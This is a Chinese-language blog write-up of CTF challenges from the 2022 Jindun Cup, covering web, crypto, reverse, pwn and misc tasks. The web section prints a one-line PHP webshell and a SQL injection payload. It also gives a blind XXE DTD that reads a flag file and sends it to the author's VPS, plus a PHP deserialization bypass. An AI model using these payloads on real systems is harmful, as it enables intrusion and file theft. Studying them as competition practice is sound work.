金盾杯2022-AGCTFS战队 wp

最新推荐文章于 2024-05-14 19:19:32 发布
最新推荐文章于 2024-05-14 19:19:32 发布
阅读量2.4k 收藏 12
点赞数 8
分类专栏: 比赛 文章标签: php web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/128390832
版权

文章目录

Web

图书馆

在这里插入图片描述

根据提示找到

干货|最全的Tomcat漏洞复现笔记 - 腾讯云开发者社区-腾讯云 (tencent.com)

然后文件上传即可

image-20221220213646423

在这里插入图片描述

EzPHP

扫目录得到index.php.bak文件,代码审计,长度小于20,且禁了许多函数,只能先查看目录,然后找flag位置。

木马文件写入,凑了一个

<?=$_GET[2]($_GET[1]);

利用[绕过_,传入木马。
在这里插入图片描述

利用assert命令执行。

image-20221220214157553

在这里插入图片描述
在这里插入图片描述
得到flag:flag{d41d48e8-e84b-4521-963d-a4258d529eff}

eZphp2

发现源码

image-20221220215907440

然后还是传入木马,这次要18位,但eval没被禁。

在这里插入图片描述
在这里插入图片描述

SQL

SQL注入,直接给了代码,用

二次url编码绕过。

Payload:

?id=-1%2527union+select+1,2,(select+flag%20from%20is_this_flag)%23

image-20221220214311946

Skip

之前见到过类似的,直接用脚本

import requests

url ='http://59.110.213.14:56935/?'+'x=1&'*999+'proxy=foo'
re = requests.get(url)
print(re.text)

在这里插入图片描述

有来无回

题目提示了xxe.php,直接访问。
在这里插入图片描述
知道了是Blind XXE to build a OOB

在网上知道到相关内容

在自己的vps上搞一个feng.dtd,然后监听9999端口

<!ENTITY % p1 SYSTEM "file:///tmp/flag.txt">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://vps/pass=%p1;'>">
%p2;
~
直接打xxe
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/flag.txt">
<!ENTITY % hack SYSTEM " http://vps/feng.dtd">
%hack;
%dtd;
]>
<cys>&xxe;</cys>

image-20221220214412850

反败为胜

在这里插入图片描述

Rc4解码,密钥为0626

得到源代码:

<?php
echo("ser.php: You find me!");
class ouo{
    private $ser_code = "ser";
    function __destruct(){
        if(!empty($this->ser_code)) {
            if($this->ser_code == "FLAG")
                echo ("{flag}");
            else
                die('Try Again!');
        }}
    function __wakeup(){
        $this->ser_code=null;
    }
}
$ser_code = $_COOKIE['SER'];
unserialize($ser_code);
?>

简单的反序列化,绕过wakeup即可。

脚本:

<?php

class ouo{
    private $ser_code = "FLAG";
}
echo urlencode(serialize(new ouo))
?>

把1改成2,绕过wakeup

Payload:

O%3A3%3A%22ouo%22%3A1%3A%7Bs%3A13%3A%22%00ouo%00ser_code%22%3Bs%3A4%3A%22FLAG%22%3B%7D

在这里插入图片描述

Crypto

小菜一碟

网上找到脚本:

import gmpy2
import binascii
p = gmpy2.mpz(159303842369547814925693476555868814571858842104258697105149515713993443203825659998652654127374510196025599003730143012113707484839253123496857732128701609968752699400092431858926716649428960535283324598902169712222454699617671683675932795780343545970625533166831907970102480122242685830820463772025494712199)
q = gmpy2.mpz(172887845783422002789082420254687566789308973977854220003084208506942637236520298084569310184947609392615644191634749946917611949170216103380692838274627779684269566710195695515000492922000964163572308396664983937642827715821977706257150587395323556335081542987902463903436949141288429937432819003811354533477)
e = gmpy2.mpz(19999)
n=p*q
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
c = gmpy2.mpz(15176702963665501922403999221895690215282504333559191936777611319802899006788248557279808041449600021838150559750953924442905812928090845724972302802437464578850548068341807388913597120410841772162320682183999897958037105171055839318049584110106368746019307718322196559113348222485399508199250407930454163630320204931310511881428526650112302088935473691025195368688328619506405195638348814876023324965555774105055157166629768444387302211760448217666053342945412276047036106026882600555168611384975424201854134312678053294600373283558738680924405596407956073538019064806588050349192904553467435863806385634189342027395)
m = pow(c, d, n)
m_hex = hex(m)[2:]
print("%s"%(binascii.a2b_hex(m_hex).decode("utf8"),))

RRSSAA

共模攻击,网上找到了脚本。

CTF-RSA_共模攻击原理及脚本_风二西的博客-CSDN博客_共模攻击

#coding:utf-8
import gmpy2
import libnum

p= 123458435421261543472541524199731235574048053128601592828113156858256897602409067025674231465244054181972626266583815939142097971979228583114373452753144521115603696730578184251357134599421315099599143482519027549135311948601114584919768962463801005587816375776795616009077822359851656097169247116759791793687
q= 97276963771653114294115524925680580949385827322024790734418230303283861043696849155355518555652095559285163994241670550744000225618126658988929239870027266570376465899405972982196485923500560008192041570421590766719044249315069438249987024660117501456707638758202318116109860915440658403715058758393977149729
e1= 2333
c1= 3091063916228464455521357922299851945733179824012337598325935431151534388234889582934719097957211574031506425780821664489121712504278835046257494105641946435467664631146730786295351188439182841680768531937382787335943965667714937822280848763425350089235645289384375623655179569897238696408868150422651859781815376696756981788347283996647604511187607188051598692339333337644956875630361418916795600637518633591481197783209020148212167599700531242494401774503456200889355439781332887736926823527200546226966803759767490748143939212274369822333951327997518975975960530675198444178464821237247544413301735105551687502988
e2= 23333
c2= 3020828772115226887000015133333821282592051548686903232559679837758040530392014545308146746971372113818852623844807332306519066119345705458457237902473211958279079988876840270162881686132679217898982958235064386584289972304614458185165683014776410738885399792032602501638437880558924737680288329872135075375340246371405482850885777367009879733890398886462506917356919767329145462495699851367240387357485822078838863882442289942481376842591016730244281710044592948116573144325447524357995553176271890557769659239135878101020400056503293673886968120697821156927485992635172356908737486318910095798432613528160497925715
n=p*q

def rsa_gong_N_def(e1,e2,c1,c2,n):
    e1, e2, c1, c2, n=int(e1),int(e2),int(c1),int(c2),int(n)
    print("e1,e2:",e1,e2)
    print(gmpy2.gcd(e1,e2))
    s = gmpy2.gcdext(e1, e2)
    print(s)
    s1 = s[1]
    s2 = s[2]
    if s1 < 0:
        s1 = - s1
        c1 = gmpy2.invert(c1, n)
    elif s2 < 0:
        s2 = - s2
        c2 = gmpy2.invert(c2, n)
    m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
    return int(m)
m = rsa_gong_N_def(e1,e2,c1,c2,n)
print(m)
print(libnum.n2s(int(m)).decode())

image-20221220214647614

simpleR

简单的RSA。

脚本

import gmpy2
import libnum

e=2
c=3136716033731914452763044128945241240021620048803150767745968848345189851269112855865110275244336447973330360214689062351028386721896599362080560109450218446175674155425523734453425305156053870568600329

a = int(gmpy2.isqrt(c))
b = libnum.n2s(a)

print(b)

rand

直接跑脚本:

import random
import time

a = 881235169941718345882433419366
t = time.mktime(time.strptime("2022-12-10 10:30:50", "%Y-%m-%d %H:%M:%S"))
random.seed(t)
rand = random.randint(0, 10 ** 30)
x = rand
flag = a ^ x
print(flag)

在这里插入图片描述

MISC

盗梦空间

使用随波逐流工具,多次base家族解码得到逆序flag

在这里插入图片描述
在线逆序

image-20221220214755122

Flag:

flag{ILoveBeiJingTianAnMen}

qianda0_Sudoku

有数为1,空格为0

在这里插入图片描述
在这里插入图片描述
Flag:flag{sud0ku_fuN}

数据泄露01-账号泄露追踪

在github中找到了

GitHub - tanyiqu66/hongxiangjiao

在项目里得到了

image-20221220214855814

所以flag为:flag{GBUfty0vMqlrGOdE}

数据泄露02-泄露的密码

关于红香蕉APP接口异常问题 - tanyiqu66 - 博客园 (cnblogs.com)

的到红香蕉的超级密码。

Flag为: flag{redbanana2022sss}

数据泄露03-泄露的密钥

又搜到了吴硕 - 知乎 (zhihu.com)

得到key

在这里插入图片描述

Flag为: flag{51d0a99c-752e-11ed-b5a7-44af28a75237}

Reverse

Tea

Ida64打开

image-20221220214953468

跟进sub_140001000

在这里插入图片描述

根据文件名称推测该算法为xxtea加密

参考https://www.jianshu.com/p/4272e0805da3 中xxtea脚本稍作修改
在这里插入图片描述

#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))

void btea(uint32_t* v, int n, uint32_t const key[4])
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1)            /* Coding Part */
    {
        rounds = 6 + 52 / n;
        sum = 0;
        z = v[n - 1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n - 1] += MX;
        } while (--rounds);
    }
    else if (n < -1)      /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52 / n;
        sum = rounds * DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;
            sum -= DELTA;
        } while (--rounds);
    }
}

int main()
{
    uint32_t v[9] =  { 0x6456DD95 ,0x2A41FD67 ,0x0AFE574A5 ,0x4BFA8D72 ,0x0E2BF316F ,0x166B34BD ,0x6232283A ,0x4A1A8794 ,0x0D591779B };
    uint32_t v8[4] = { 0x5571CB4E ,0xC38A9D2F ,0x1D835B62,0x93C3DC19 };
    int n = 9;
    btea(v, -n, v8);
    for (int i = 0; i < 9; i++) {
        for (int j = 0; j < 4; j++) {
            printf("%c", v[i]);
            v[i] >>=8;
        }
    }
    return 0;
}

运行得Flag:flag{3430DF69-C220-40F9-9667-2B8C4A2FE6E9}

Pwn

Login

原题pwnable 笔记 Rookiss - simple login - 50 pt_TaQini852的博客-CSDN博客

参考原题写出脚本

image-20221220215109854

运行后在home/pwn目录下找到flag

Flag:flag{wel30me_t0_l0g1n}

Wtf

nc后知运行顺序为python先elf后

ida64分析elf

在这里插入图片描述
在这里插入图片描述
输入-1能使其一直读入,直到遇到回车,溢出点为a1,a1在主函数控制覆盖返回地址为win函数缓冲区一共是4096,加上-1和\n,扣掉就是4094。填满输入缓冲区,可读取payload。

编写脚本

image-20221220215146995
运行得flag
在这里插入图片描述

运行后在home/pwn目录下找到flag

Flag:flag{wel30me_t0_l0g1n}

f0njl
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第二届金盾信安部分wp
doraemon12345的博客
12-21 791
1.注意数字 打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到 但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag 2.小火龙 下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass 手动分离得到压缩包,然后用密码打开得到flag 3.我和十
2021-12-12金盾Re Wp
qq_52250819的博客
12-15 516
Re1 flag = 'gnbc~0221gg00>4f;g221944=1>62c61=3d71~' key = [1,2,3,4,5,6,7] aaa = [] for i in range(0,len(flag)): a=ord(flag[i]) aaa.append(a^key[i%7]) print(''.join(map(chr,aaa))) flag{6533dc5695d8c74686794813a5585c63} Re2 Main函数没有用.
2021-河南省金盾-部分题目wp(详细)
02-06
WEB:上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
河南省“第三届金盾信安“部分WP
MXPXT的博客
01-05 973
河南省"第三届金盾信安"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):https://github.com/mufeedvh/basecrack 下载文件发现一大串字符用base32解密, 得到字符串用base64解密, 得到字符串用base32解密, 得到字符串用base16解密, [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LMH5BnZh-1641391
网络安全最全CTF工控工业互联网(ISC)复现总结WP(超详细)_工控ctf(2),2024年最新程序员进阶
最新发布
2401_84253037的博客
05-14 707
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
第二届金盾信安 web wp1-3
giaogiao123的博客
12-22 3171
by 七岁。 web1 考察命令执行 shell命令操作符 基本上过滤了所有可用的命令 平时我们都是ls 查看目录 仔细发现dir命令并没有被禁止 所以我们可以dir%09.%09 也是这样的 . 表示当前目录 然后就是读文件命令 被ban了那么多还有几个忽略了 cut 命令awk sed fmt等等 来看看cut命令 试一试别的 等等,最后payload cmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09 web2 payload: Class W
金盾高级2016S-VIP+版+加密端
09-24
金盾高级2016S-VIP+版是一款专门针对视频内容进行安全保护的加密软件。这款产品的主要功能是为视频文件提供高级别的安全防护,防止未经授权的非法访问和复制,确保内容创作者的知识产权得到充分保护。以下是关于该...
金盾2016-2017逆向分析系列教程
07-23
教程名称:金盾2016-2017逆向分析系列教程  资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
第四届金盾信安.zip
12-18
2022年第四届金盾信安题目Misc+Reverse+Crypto
易语言金盾护航源码-易语言
06-13
易语言金盾护航源码是一款基于易语言开发的系统工具源码,旨在提供安全防护功能,保护用户的计算机系统免受恶意软件和病毒的侵害。易语言是中国本土开发的一种编程语言,它以其独特的汉字编程模式,降低了编程的技术...
河南省第三届金盾信安网络安全大赛部分wp
七堇年的博客
12-23 3911
河南省第三届金盾信安网络安全大赛部分wp
2020年12月20日-河南省金盾 JDBCTF Crypto+Misc题目打包
12-21
2020年河南金盾 JDBCTF Crypto+Misc题目打包下载
2021 金盾 pwn3 wp
yongbaoii的博客
01-20 611
保护显然是全开 放size的chunk跟放地址的chunk挨着 然后数组能越界 所以当我们申请序号是16的chunk的时候 chunk的地址会写在chunk0的size地方 就造成了堆溢出 然后我们申请的chunk只能是large bin里的。 所以这道题说白了就是 2.27 large bin 堆溢出。 我们试图考虑利用攻击global_max_fast的手法,我们虽然能够覆盖到global_max_fast,但是我们申请的chunk的大小不够,不够我们后续的chunk释放分配到_IO_list_.
第二届“金盾信安”网络安全大赛misc部分wp
没用的阿吉
02-06 848
文章目录前言一、4位数字二、小火龙三、五瓶药水 前言 全为miscwp 一、4位数字   下载后得到一个压缩包,打开需要密码,文件名已经提示为四位数字,所以直接上ARCHPR进行爆破   爆破拿到密码9156   打开后是两个文件   在路飞的烦恼中直接看到社会主义核心价值观直接解密,贴上解密网址https://ctf.bugku.com/tool/cvecode解密后得到 ++++++++[>>++>++++>++++++>++++++++>+++++++++
河南省第五届“金盾信安”网络与数据安全大赛实操技能赛 部分wp(自己的一些思路和解析 )(主misc crypto )
路baby的博客
11-26 1287
河南省第五届“金盾信安”网络与数据安全大赛实操技能赛 部分wp 主misc crypto (来都来了,Honor,我看看谁还不会RSA,hakiehs,Font,ApeCoin,Easyphp,Ezupload,get_source)
河南省第五届“金盾信安”网络与数据安全大赛-WP
tlp_zzm的博客
11-26 3392
看到该题之后发现是私钥加密,公钥解密脚本代码:n = p*qe=37777。
河南省第五届“金盾信安”网络与数据安全大赛线上wp
qq_52342676的博客
11-26 1590
操作内容:​拿到压缩包之后发现是伪加密​​将压缩包中的字符base64解密一次缩小即可得出flag​​​flag值:​。
2021 金盾 pwn4
yongbaoii的博客
01-19 367
2020金盾信安wp
Atkx's Blog
12-22 1272
CRYPTO base 内容:链接: https://pan.baidu.com/s/18oejcVD2ywcSuHo5mqTP1A 密码: hbg4 base64转图片 扫码得 F#S<YReBy{f.WwU{CSv^e^'n*D Base92解码 MISC 注意数字 内容:链接: https://pan.baidu.com/s/14yqufylp_V4iviXUQLm4Nw 密码: k0ji 3 9 仿射密码 小火龙冲啊 内容:链接: https://pan.baidu.com/s/1_Te
金盾2016s提取工具
07-06
金盾2016s提取工具是一种用于金融行业的数据提取工具。金盾系统是中国金融监管部门开发的一套综合性监管系统,用于收集、分析和监控金融机构的数据。金盾2016s提取工具是该系统的一个重要组成部分,它允许金融机构...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值